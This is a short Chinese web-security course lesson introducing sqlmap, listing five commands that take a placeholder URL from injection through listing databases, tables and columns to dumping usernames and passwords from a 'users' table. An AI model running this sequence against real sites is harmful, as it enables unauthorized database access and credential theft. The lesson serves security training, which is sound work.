风炫安全WEB安全学习第十七节课 使用Sqlmap自动化注入(一)
sqlmap的使用
sqlmap 是一个开源渗透测试工具,它可以自动检测和利用 SQL 注入漏洞并接管数据库服务器。它具有强大的检测引擎,同时有众多功能,包括数据库指纹识别、从数据库中获取数据、访问底层文件系统以及在操作系统上带内连接执行命令。
项目地址: https://github.com/sqlmapproject/sqlmap
- 第一步:
-u "xxx"-u 参数指定地址然后进行注入 - 第二步
-u "xxx" --current-db获取到当前数据库信息 - 第三步
-u "xxx" -D dbvuln --tables获取数据库中的表名 - 第四步
-u "xxx" -D dbvuln -T users --columns获取表名中的字段 - 第五步
-u "xxx" -D dbvuln -T users -C username,password --dump获取表中的内容